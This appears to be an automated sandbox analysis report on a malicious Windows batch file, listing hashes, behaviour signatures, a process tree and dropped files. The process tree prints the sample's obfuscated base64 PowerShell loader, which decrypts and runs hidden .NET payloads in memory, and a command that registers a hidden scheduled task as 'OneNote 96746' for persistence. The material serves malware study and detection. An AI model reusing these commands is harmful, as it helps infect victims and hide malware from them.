Overview
overview
10Static
static
10068428a4ac...26.exe
windows11-21h2-x64
80c4791a6b4...ea.elf
windows11-21h2-x64
30d9bd2ae2e...ea.exe
windows11-21h2-x64
70fa00d4f4f...70.dll
windows11-21h2-x64
110de02fec8...d1.bat
windows11-21h2-x64
81157191701...32.exe
windows11-21h2-x64
716e81343ec...a5.exe
windows11-21h2-x64
717691f0962...b7.elf
windows11-21h2-x64
317c24104e8...12.exe
windows11-21h2-x64
31816cd993d...28.exe
windows11-21h2-x64
71b8cda768b...8a.elf
windows11-21h2-x64
31df6acbc11...b7.elf
windows11-21h2-x64
31e7706ed04...b0.elf
windows11-21h2-x64
31f580428fa...2c.elf
windows11-21h2-x64
3257fc477b9...cc.elf
windows11-21h2-x64
3262a10ee37...50.elf
windows11-21h2-x64
3267909cf4a...e7.bat
windows11-21h2-x64
102796760675...13.elf
windows11-21h2-x64
327e181c699...8c.elf
windows11-21h2-x64
32b4b073178...74.elf
windows11-21h2-x64
32b5bf75c0a...35.exe
windows11-21h2-x64
72bac99f5be...ec.elf
windows11-21h2-x64
32cfeefaa13...50.elf
windows11-21h2-x64
32e48ee0fb3...66.exe
windows11-21h2-x64
102e4d872360...5b.exe
windows11-21h2-x64
1031b6a60839...1b.exe
windows11-21h2-x64
3320ccae2e9...0d.exe
windows11-21h2-x64
103476006a8f...16.apk
windows11-21h2-x64
33545082c16...2e.elf
windows11-21h2-x64
3377c3c3679...05.elf
windows11-21h2-x64
33c40413f93...f5.exe
windows11-21h2-x64
10cbe27936a3...8b.iso
windows11-21h2-x64
3Resubmissions
22-04-2024 22:02
240422-1xtwbagh68 1022-04-2024 19:25
240422-x42b7afa68 1019-04-2024 03:02
240419-djmthsfh8w 10Analysis
-
max time kernel
201s -
max time network
213s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system -
submitted
22-04-2024 19:25
Static task
static1
Behavioral task
behavioral1
Sample
068428a4acb65807251b3b4c0aee2101519fdaebf6db5376863da5add3471f26.exe
Resource
win11-20240412-en
Behavioral task
behavioral2
Sample
0c4791a6b47491a0c43cea0ba54357e391a3c8b23aa28025489bbe43bb9ea6ea.elf
Resource
win11-20240412-en
Behavioral task
behavioral3
Sample
0d9bd2ae2e4b023047b6c08684e9e5daae76e31cced4c3fdf4640136245f7eea.exe
Resource
win11-20240412-en
Behavioral task
behavioral4
Sample
0fa00d4f4f8e8449883aef7f0459a0fb754d57d55af2b41f5e445f867000fa70.dll
Resource
win11-20240412-en
Behavioral task
behavioral5
Sample
10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1.bat
Resource
win11-20240412-en
Behavioral task
behavioral6
Sample
11571917015adbf3b5196509e1082c8d415f011cce88bd8b16e9d9c5a39ac432.exe
Resource
win11-20240412-en
Behavioral task
behavioral7
Sample
16e81343ecea6082d76bf1ab26818c3bf56929c92468fae8837c6384b62d05a5.exe
Resource
win11-20240412-en
Behavioral task
behavioral8
Sample
17691f0962027e7110f727ae997f8af5885dd783674d1db023d467ec478515b7.elf
Resource
win11-20240412-en
Behavioral task
behavioral9
Sample
17c24104e8e5350eeb7e2a162dec3f6a4d6c70f3f0849e6346fd383d998dcc12.exe
Resource
win11-20240412-en
Behavioral task
behavioral10
Sample
1816cd993ddda970b791b090e6ecb501ef923bdcc0cc5f4a99e18dcdb7093228.exe
Resource
win11-20240412-en
Behavioral task
behavioral11
Sample
1b8cda768ba75d723b2b0b34cf955f7ec9469b4e33c6fde6494eefd60a139d8a.elf
Resource
win11-20240412-en
Behavioral task
behavioral12
Sample
1df6acbc1106e17265fde3ab54b2a83fa8f6f39656d7c55481b2dbd66f1114b7.elf
Resource
win11-20240412-en
Behavioral task
behavioral13
Sample
1e7706ed0492572474cd866f13778cc66c42b614b3d0b1d9af35727c051a50b0.elf
Resource
win11-20240412-en
Behavioral task
behavioral14
Sample
1f580428fa8afd15832fcd04f5d6832be9f7a7144ff17e19c89d2b07e7f51f2c.elf
Resource
win11-20240412-en
Behavioral task
behavioral15
Sample
257fc477b9684863e0822cbad3606d76c039be8dd51cdc13b73e74e93d7b04cc.elf
Resource
win11-20240412-en
Behavioral task
behavioral16
Sample
262a10ee377a4945ce30e115e2ab1bf9ff2fc0f35741bbb72e40f145de24bd50.elf
Resource
win11-20240412-en
Behavioral task
behavioral17
Sample
267909cf4a62955a35b0fe013afbfd62d7ae1a1eef6d7a24d7ce50db52d48ce7.bat
Resource
win11-20240412-en
Behavioral task
behavioral18
Sample
2796760675e5efbef0319f0285c2e1d07c11b038311c02e16c2407ba57c38413.elf
Resource
win11-20240412-en
Behavioral task
behavioral19
Sample
27e181c699f14c3e53cabc89941ac40917165cc4be34d2c7f9d6eca0e16b508c.elf
Resource
win11-20240412-en
Behavioral task
behavioral20
Sample
2b4b073178b573aa181fdc6e8063c778c90f76235d640c186b99278186509e74.elf
Resource
win11-20240412-en
Behavioral task
behavioral21
Sample
2b5bf75c0aede1169e7aa2b4c760b1852f34990d5b8ce27ca2fa21efa35e0635.exe
Resource
win11-20240412-en
Behavioral task
behavioral22
Sample
2bac99f5be34b649749a4ce8ab7c8103f9dce863cbc490f273c27297b2c465ec.elf
Resource
win11-20240412-en
Behavioral task
behavioral23
Sample
2cfeefaa133519defee56f4253c7c7f2396d784ed8e09d2212ab5bee6cf52b50.elf
Resource
win11-20240412-en
Behavioral task
behavioral24
Sample
2e48ee0fb3ddd63efeecd900a9d2bde365e2fe1fcbb3c43c882362ae935c5066.exe
Resource
win11-20240412-en
Behavioral task
behavioral25
Sample
2e4d8723602c5ffc6409dceb0cb4ced2e749e374a0fcd41fe92e0fd50f817c5b.exe
Resource
win11-20240412-en
Behavioral task
behavioral26
Sample
31b6a608393ad6cadd7eadf286795aef37260c9b99e837f1d7a1aa4e9a7f901b.exe
Resource
win11-20240412-en
Behavioral task
behavioral27
Sample
320ccae2e9ae546c56193c24cb12cc54f29a872c08856cc143294dd2cf8a170d.exe
Resource
win11-20240412-en
Behavioral task
behavioral28
Sample
3476006a8f64bfe72a8b04477f6005293b5854cfbc58bee2ea28e59b58f0e316.apk
Resource
win11-20240412-en
Behavioral task
behavioral29
Sample
3545082c16d0e05faad342c614b27793ab0ec940a174ab5162dce1787ea8472e.elf
Resource
win11-20240412-en
Behavioral task
behavioral30
Sample
377c3c3679e44acbc13388ca7ec69f2346b321aa42110fc6ee44a44c54d67105.elf
Resource
win11-20240412-en
Behavioral task
behavioral31
Sample
3c40413f9340d25dc7f2c4358583706b1eb19962cb74669bf8276597e871faf5.exe
Resource
win11-20240412-en
Behavioral task
behavioral32
Sample
cbe27936a3beb1902517906f7da1d6d3f6ef8d1a0eda5e033f4da436df7cd88b.iso
Resource
win11-20240412-en
General
-
Target
10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1.bat
-
Size
1.1MB
-
MD5
4030841f8cd4b3ac37ab0a0b9332f3a5
-
SHA1
6d05584de372399fbadd59a1e6a1eefee90f8725
-
SHA256
10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1
-
SHA512
a8c40c3fa3f7f9ba47eed94a55a2562719073fd568d4aa96a081a46ce150e0b068b453e812eaef3fe15cafae3b66127e23ed4d72669173c8c254ba58d32534c0
-
SSDEEP
24576:+NAwcGqisVN8rXpLOnM+YCftp99Jj9Pgxp1QrKDI:+NKVVsxmt9j
Malware Config
Signatures
-
Blocklisted process makes network request 19 IoCs
Processes:
powershell.exeflow pid process 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe 1 1128 powershell.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 912 powershell.exe 912 powershell.exe 128 powershell.exe 128 powershell.exe 4576 powershell.exe 4576 powershell.exe 2352 powershell.exe 2352 powershell.exe 1128 powershell.exe 1128 powershell.exe 1468 powershell.exe 1468 powershell.exe 2324 powershell.exe 2324 powershell.exe 4668 powershell.exe 4668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 912 powershell.exe Token: SeDebugPrivilege 128 powershell.exe Token: SeDebugPrivilege 4576 powershell.exe Token: SeIncreaseQuotaPrivilege 4576 powershell.exe Token: SeSecurityPrivilege 4576 powershell.exe Token: SeTakeOwnershipPrivilege 4576 powershell.exe Token: SeLoadDriverPrivilege 4576 powershell.exe Token: SeSystemProfilePrivilege 4576 powershell.exe Token: SeSystemtimePrivilege 4576 powershell.exe Token: SeProfSingleProcessPrivilege 4576 powershell.exe Token: SeIncBasePriorityPrivilege 4576 powershell.exe Token: SeCreatePagefilePrivilege 4576 powershell.exe Token: SeBackupPrivilege 4576 powershell.exe Token: SeRestorePrivilege 4576 powershell.exe Token: SeShutdownPrivilege 4576 powershell.exe Token: SeDebugPrivilege 4576 powershell.exe Token: SeSystemEnvironmentPrivilege 4576 powershell.exe Token: SeRemoteShutdownPrivilege 4576 powershell.exe Token: SeUndockPrivilege 4576 powershell.exe Token: SeManageVolumePrivilege 4576 powershell.exe Token: 33 4576 powershell.exe Token: 34 4576 powershell.exe Token: 35 4576 powershell.exe Token: 36 4576 powershell.exe Token: SeDebugPrivilege 2352 powershell.exe Token: SeIncreaseQuotaPrivilege 2352 powershell.exe Token: SeSecurityPrivilege 2352 powershell.exe Token: SeTakeOwnershipPrivilege 2352 powershell.exe Token: SeLoadDriverPrivilege 2352 powershell.exe Token: SeSystemProfilePrivilege 2352 powershell.exe Token: SeSystemtimePrivilege 2352 powershell.exe Token: SeProfSingleProcessPrivilege 2352 powershell.exe Token: SeIncBasePriorityPrivilege 2352 powershell.exe Token: SeCreatePagefilePrivilege 2352 powershell.exe Token: SeBackupPrivilege 2352 powershell.exe Token: SeRestorePrivilege 2352 powershell.exe Token: SeShutdownPrivilege 2352 powershell.exe Token: SeDebugPrivilege 2352 powershell.exe Token: SeSystemEnvironmentPrivilege 2352 powershell.exe Token: SeRemoteShutdownPrivilege 2352 powershell.exe Token: SeUndockPrivilege 2352 powershell.exe Token: SeManageVolumePrivilege 2352 powershell.exe Token: 33 2352 powershell.exe Token: 34 2352 powershell.exe Token: 35 2352 powershell.exe Token: 36 2352 powershell.exe Token: SeIncreaseQuotaPrivilege 2352 powershell.exe Token: SeSecurityPrivilege 2352 powershell.exe Token: SeTakeOwnershipPrivilege 2352 powershell.exe Token: SeLoadDriverPrivilege 2352 powershell.exe Token: SeSystemProfilePrivilege 2352 powershell.exe Token: SeSystemtimePrivilege 2352 powershell.exe Token: SeProfSingleProcessPrivilege 2352 powershell.exe Token: SeIncBasePriorityPrivilege 2352 powershell.exe Token: SeCreatePagefilePrivilege 2352 powershell.exe Token: SeBackupPrivilege 2352 powershell.exe Token: SeRestorePrivilege 2352 powershell.exe Token: SeShutdownPrivilege 2352 powershell.exe Token: SeDebugPrivilege 2352 powershell.exe Token: SeSystemEnvironmentPrivilege 2352 powershell.exe Token: SeRemoteShutdownPrivilege 2352 powershell.exe Token: SeUndockPrivilege 2352 powershell.exe Token: SeManageVolumePrivilege 2352 powershell.exe Token: 33 2352 powershell.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
cmd.execmd.exepowershell.execmd.execmd.exepowershell.exedescription pid process target process PID 3500 wrote to memory of 3464 3500 cmd.exe cmd.exe PID 3500 wrote to memory of 3464 3500 cmd.exe cmd.exe PID 3500 wrote to memory of 3496 3500 cmd.exe cmd.exe PID 3500 wrote to memory of 3496 3500 cmd.exe cmd.exe PID 3496 wrote to memory of 2380 3496 cmd.exe cmd.exe PID 3496 wrote to memory of 2380 3496 cmd.exe cmd.exe PID 3496 wrote to memory of 2800 3496 cmd.exe cmd.exe PID 3496 wrote to memory of 2800 3496 cmd.exe cmd.exe PID 3496 wrote to memory of 912 3496 cmd.exe powershell.exe PID 3496 wrote to memory of 912 3496 cmd.exe powershell.exe PID 912 wrote to memory of 128 912 powershell.exe powershell.exe PID 912 wrote to memory of 128 912 powershell.exe powershell.exe PID 912 wrote to memory of 4576 912 powershell.exe powershell.exe PID 912 wrote to memory of 4576 912 powershell.exe powershell.exe PID 912 wrote to memory of 2352 912 powershell.exe powershell.exe PID 912 wrote to memory of 2352 912 powershell.exe powershell.exe PID 912 wrote to memory of 3696 912 powershell.exe cmd.exe PID 912 wrote to memory of 3696 912 powershell.exe cmd.exe PID 3696 wrote to memory of 4984 3696 cmd.exe cmd.exe PID 3696 wrote to memory of 4984 3696 cmd.exe cmd.exe PID 4984 wrote to memory of 932 4984 cmd.exe cmd.exe PID 4984 wrote to memory of 932 4984 cmd.exe cmd.exe PID 4984 wrote to memory of 4564 4984 cmd.exe cmd.exe PID 4984 wrote to memory of 4564 4984 cmd.exe cmd.exe PID 4984 wrote to memory of 1128 4984 cmd.exe powershell.exe PID 4984 wrote to memory of 1128 4984 cmd.exe powershell.exe PID 1128 wrote to memory of 1468 1128 powershell.exe powershell.exe PID 1128 wrote to memory of 1468 1128 powershell.exe powershell.exe PID 1128 wrote to memory of 2324 1128 powershell.exe powershell.exe PID 1128 wrote to memory of 2324 1128 powershell.exe powershell.exe PID 1128 wrote to memory of 4668 1128 powershell.exe powershell.exe PID 1128 wrote to memory of 4668 1128 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\2⤵PID:3464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\3⤵PID:2380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1.bat';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24ga1JGT2soJERNSmFHKXskUXpwdGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JFF6cHRlLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskUXpwdGUuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRRenB0ZS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnRjB3NXFsREI3QUlVTmtQVG5CWTBQeUVod2ppZzM0Zm1wb3I5S2ZqeWtvYz0nKTskUXpwdGUuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnZHJXWWdZV3ptMEhxQjA1ZHpyck1Ddz09Jyk7JGRHR2VBPSRRenB0ZS5DcmVhdGVEZWNyeXB0b3IoKTskT2tGeWU9JGRHR2VBLlRyYW5zZm9ybUZpbmFsQmxvY2soJERNSmFHLDAsJERNSmFHLkxlbmd0aCk7JGRHR2VBLkRpc3Bvc2UoKTskUXpwdGUuRGlzcG9zZSgpOyRPa0Z5ZTt9ZnVuY3Rpb24gbEZOSHYoJERNSmFHKXskUHZ3WXc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkRE1KYUcpOyRiYW9EZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JGxYcUJ3PU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJFB2d1l3LFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskbFhxQncuQ29weVRvKCRiYW9EZCk7JGxYcUJ3LkRpc3Bvc2UoKTskUHZ3WXcuRGlzcG9zZSgpOyRiYW9EZC5EaXNwb3NlKCk7JGJhb0RkLlRvQXJyYXkoKTt9JHJydUhvPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskeGJuQW09bEZOSHYgKGtSRk9rIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJHJydUhvLCA1KS5TdWJzdHJpbmcoMikpKSk7JE9NU3hJPWxGTkh2IChrUkZPayAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRycnVIbywgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kT01TeEkpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJHhibkFtKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "3⤵PID:2800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 96746' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\strt.cmd"4⤵
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\strt.cmd"5⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\6⤵PID:932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\strt.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24ga1JGT2soJERNSmFHKXskUXpwdGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JFF6cHRlLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskUXpwdGUuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRRenB0ZS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnRjB3NXFsREI3QUlVTmtQVG5CWTBQeUVod2ppZzM0Zm1wb3I5S2ZqeWtvYz0nKTskUXpwdGUuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnZHJXWWdZV3ptMEhxQjA1ZHpyck1Ddz09Jyk7JGRHR2VBPSRRenB0ZS5DcmVhdGVEZWNyeXB0b3IoKTskT2tGeWU9JGRHR2VBLlRyYW5zZm9ybUZpbmFsQmxvY2soJERNSmFHLDAsJERNSmFHLkxlbmd0aCk7JGRHR2VBLkRpc3Bvc2UoKTskUXpwdGUuRGlzcG9zZSgpOyRPa0Z5ZTt9ZnVuY3Rpb24gbEZOSHYoJERNSmFHKXskUHZ3WXc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkRE1KYUcpOyRiYW9EZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JGxYcUJ3PU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJFB2d1l3LFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskbFhxQncuQ29weVRvKCRiYW9EZCk7JGxYcUJ3LkRpc3Bvc2UoKTskUHZ3WXcuRGlzcG9zZSgpOyRiYW9EZC5EaXNwb3NlKCk7JGJhb0RkLlRvQXJyYXkoKTt9JHJydUhvPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskeGJuQW09bEZOSHYgKGtSRk9rIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJHJydUhvLCA1KS5TdWJzdHJpbmcoMikpKSk7JE9NU3hJPWxGTkh2IChrUkZPayAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRycnVIbywgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kT01TeEkpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJHhibkFtKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "6⤵PID:4564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\strt')7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 96746' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4668
-
-
-
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
1KB
MD53de28cd5f59fc1551ce2e2f375c6e93a
SHA13a68302c7a7d951134367b7f02af44543e42cc71
SHA256199df76d6e45683f420a85e7b6cc5e708c2eefef6998e8fb48e63e3c52c54ca7
SHA512d860b2024ad0f6b4b53af2c3fd274fae5351fbf11f697004646b188ffcd533b88164dc5543598ac0fd0ac8638996af1fe171945ddacb53a8c3347e4791839c94
-
Filesize
1KB
MD54a24cd2f7eea1929ac05a4dc990d3e67
SHA1a5a1ee3e677d7c5991437c8345eaa933ac57294f
SHA2568ab16f36aefdeee67c57653d0ce6ecc5bc7d114597d20de7361ca8a78c222ee6
SHA512a283d3efc7ee602c01751eb46ef258993f3e19eef515aa9cc1c749b1217ea4eb10187573ffab3926e11711b428873222a556125702e2d6e5c3693e588b7a39cc
-
Filesize
1KB
MD552805a54fc501a9f52f785d9cc7cce8a
SHA1de4e1c104761cb0c2f89ed726d8373906a0bf844
SHA2568b877cb7cdc0e43808518e437605baa2e905cb707a047eb66bed83848f3292d6
SHA512fd7f479ce372c524d3b95527849016b257e93c97990afad219776f5fe537bc02f15bd0444fc5f53b3f6c9e4b7818db61df26ad903c93138369a184974d2ea319
-
Filesize
1KB
MD54dcb591f64c5a200feded5b3963da678
SHA177c4941ac998d3cc3e55f74b0a152b7138e2fb67
SHA2561fbd242d477324cd00b4eca95abe8d353ce7fb4898e7fcbd8b579c48dfb598b7
SHA51208d81df9bbfea221341f7d79dab541957b618a2690657b3448b5ffb9f4e5b4b2eb4ea00188e6a071aa41e09e38c2242299c8f0027261a39cece900fc09a4dce3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.1MB
MD54030841f8cd4b3ac37ab0a0b9332f3a5
SHA16d05584de372399fbadd59a1e6a1eefee90f8725
SHA25610de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1
SHA512a8c40c3fa3f7f9ba47eed94a55a2562719073fd568d4aa96a081a46ce150e0b068b453e812eaef3fe15cafae3b66127e23ed4d72669173c8c254ba58d32534c0